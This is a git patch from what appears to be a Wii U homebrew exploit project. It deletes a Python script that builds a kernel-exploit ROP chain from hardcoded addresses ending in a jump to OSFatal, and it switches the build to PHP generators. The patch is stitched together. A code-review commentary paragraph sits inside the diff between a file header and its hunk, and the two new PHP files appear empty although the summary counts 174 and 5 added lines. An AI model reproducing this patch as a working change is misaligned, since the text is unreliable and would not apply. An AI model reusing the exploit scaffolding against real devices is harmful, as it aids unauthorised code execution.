From e3ef554d6d83379605f41c643309b23fc3355747 Mon Sep 17 00:00:00 2001
From: orboditilt <45944072+orboditilt@users.noreply.github.com>
Date: Wed, 23 Jan 2019 21:31:59 +0100
Subject: [PATCH] - Use wiiuhaxx_common for creating a ROP - Add WIP kernel exploit ROP
---
 .gitignore | 1 +
 README.md | 2 +
 kexploit/Makefile | 24 +++-
 kexploit/generate_rop.py | 74 -------------
 kexploit/generatepayload.php | 174 +++++++++++++++++++++++++++++++
 kexploit/wiiuhaxx_common_cfg.php | 5 +
 6 files changed, 200 insertions(+), 80 deletions(-)
 delete mode 100644 kexploit/generate_rop.py
 create mode 100644 kexploit/generatepayload.php
 create mode 100644 kexploit/wiiuhaxx_common_cfg.php
diff --git a/.gitignore b/.gitignore
index 1377554..d0a17f0 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1 +1,2 @@
 *.swp
+wiiuhaxx_common/
\ No newline at end of file
diff --git a/README.md b/README.md
index 1cf41e4..cbdf342 100644
--- a/README.md
+++ b/README.md
@@ -9,6 +9,8 @@ Required:
 * Python 3.6 or greater in path as python3 (Edit Makefile for other configs)
 * make
+* php
+* A copy of the [wiiuhaxx_common release files (>=0.3](https://github.com/wiiu-env/wiiuhaxx_common/releases) inside a folder `wiiuhaxx_common.`
 ```
 git clone --recurse-submodules https://github.com/jam1garner/ROBChain.git && \
diff --git a/kexploit/Makefile b/kexploit/Makefile
index 4f9849a..b5d3b84 100644
--- a/kexploit/Makefile
+++ b/kexploit/Makefile
@@ -1,14 +1,26 @@
+wiiuhaxx_common_path := ../wiiuhaxx_common/wiiu_browserhax_common.php
+wiiuhaxx_common_cfg := wiiuhaxx_common_cfg.php
+pymsc_asm_py := ../pymsc/asm.py
+
 all: clean exploit.mscsb
 clean:
 rm -f exploit.mscsb payload.s main.s
-exploit.mscsb: payload.s Scripts main.s
- python3 ../pymsc/asm.py
+exploit.mscsb: $(pymsc_asm_py) payload.s Scripts main.s
+ python ../pymsc/asm.py
-payload.s: payload.bin
- python3 generate_payload.py
+payload.s: payload.bin
+ python generate_payload.py
-main.s: rop_setup.s
- python3 generate_rop.py
+main.s: rop_setup.s $(wiiuhaxx_common_cfg) $(wiiuhaxx_common_path)
+ php generatepayload.php > main.s
+
+$(pymsc_asm_py):
+ if [ -a $(pymsc_asm_py) ]; then $(error missing $(pymsc_asm_py) (git clone recursive)); fi;
+
+$(wiiuhaxx_common_path):
+ if [ -a $(wiiuhaxx_common_path) ]; then $(error missing $(wiiuhaxx_common_path)); fi;
+$(wiiuhaxx_common_cfg):
+ if [ -a $(wiiuhaxx_common_cfg) ]; then $(error missing $(wiiuhaxx_common_cfg)); fi;
\ No newline at end of file
diff --git a/kexploit/generate_rop.py b/kexploit/generate_rop.py
deleted file mode 100644
index 6b15185..0000000
--- a/kexploit/generate_rop.py
+++ /dev/null
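Review bot: In the three new guard rules (`$(pymsc_asm_py):`, `$(wiiuhaxx_common_path):`, `$(wiiuhaxx_common_cfg):`) the shell `if [ -a … ]; then …; fi` is dead code: make expands `$(error …)` while preparing the recipe line, before any shell is spawned, so the message fires as soon as the rule is selected, which only happens when the file is missing — the guard works, but the wrapper advertises a test that never runs (and unary `-a` is a bash/ksh extension; POSIX `test` spells it `-e`). Each recipe can be reduced to the single line `$(error missing $(pymsc_asm_py) (git clone recursive))` and likewise for its two siblings, which makes the intent visible. `main.s` is produced by `php generatepayload.php > main.s`, so a generator that fails after the shell has already truncated the file leaves an empty `main.s` that is newer than its prerequisites; `php generatepayload.php > $@.tmp && mv -f $@.tmp $@` (or a `.DELETE_ON_ERROR:` line at the top) avoids that, and `generatepayload.php` itself belongs in that rule's prerequisite list since editing it must regenerate the output. The recipes now invoke `python` while the README context line in this same patch still requires the interpreter to be on the path as `python3`; one of the two should change so that what the build runs matches what is documented. The generated `main.s` now comes from including `$(wiiuhaxx_common_path)`, a PHP file copied from a GitHub release into a git-ignored directory with no version pin or checksum, so the build depends on whatever that folder currently holds; recording the expected release (the README says ≥0.3) and verifying a hash in the guard rule would make the output reproducible and detect a tampered or mismatched download.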
@@ -1,74 +0,0 @@
-
-# Addresses
-LOAD_R3_ADDR = 0x0C00C650
-OSFATAL_ADDR = 0x01031618
-
-def write32(u32):
- global script
- script += f"pushInt. {hex(u32)}\n"
-
-def writePayloadAddress():
- global script
- script += "pushVar. globalVar,mscScriptAddress\n"
-
-def writeEnd():
- global script
- script += "#Execute ROP chain\nexit\n\n#Dunno why but I figured I might as well put it here, should never hit this though\nend"
-
-"""
-Example payload (writeOSFatalPayload func)
-
-pushInt. 0xC00C650
-pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal)
-pushInt. 0xBEEF0001
-pushInt. 0xBEEF0002
-pushInt. 0xBEEF0003
-pushInt. 0xBEEF0004
-pushInt. 0xBEEF0005
-pushInt. 0xBEEF0006
-pushInt. 0xBEEF0007
-pushInt. 0xBEEF0008
-pushInt. 0xBEEF0009
-pushInt. 0xBEEF000A
-pushInt. 0xBEEF000B
-pushInt. 0xBEEF000C
-pushInt. 0xBEEF000D
-pushInt. 0xBEEF000E
-pushInt. 0xBEEF000F
-pushInt. 0xBEEF0010
-pushInt. 0xBEEF0011
-pushInt. 0xBEEF0012
-pushInt. 0xBEEF0013
-pushInt. 0xBEEF0014
-pushInt. 0xBEEF0015
-pushInt. 0xBEEF0016
-pushInt. 0xBEEF0017
-pushInt. 0xBEEF0018
-pushInt. 0xBEEF0019
-pushInt. 0xBEEF001A
-pushInt. 0x01031618 #return address (OSFatal)
-
-"""
-
-# Print out contents of payload as null terminated string
-def writeOSFatalPayload():
- write32(LOAD_R3_ADDR)
- writePayloadAddress()
- for i in range(0x1A):
- write32(0xBEEF0000 + i + 1)
- write32(OSFATAL_ADDR)
- writeEnd()
-
-
-def main():
- global script
- with open('rop_setup.s', 'r') as f:
- script = f.read()
-
- writeOSFatalPayload()
-
- with open("main.s", 'w') as f:
- f.write(script)
-
-if __name__ == "__main__":
- main()
diff --git a/kexploit/generatepayload.php b/kexploit/generatepayload.php
new file mode 100644
index 0000000..0d364be
--- /dev/null
+++ b/kexploit/generatepayload.php
@@ -0,0 +1,174 @@
+
\ No newline at end of file
diff --git a/kexploit/wiiuhaxx_common_cfg.php b/kexploit/wiiuhaxx_common_cfg.php
new file mode 100644
index 0000000..126acf7
--- /dev/null
+++ b/kexploit/wiiuhaxx_common_cfg.php
@@ -0,0 +1,5 @@
+
\ No newline at end of file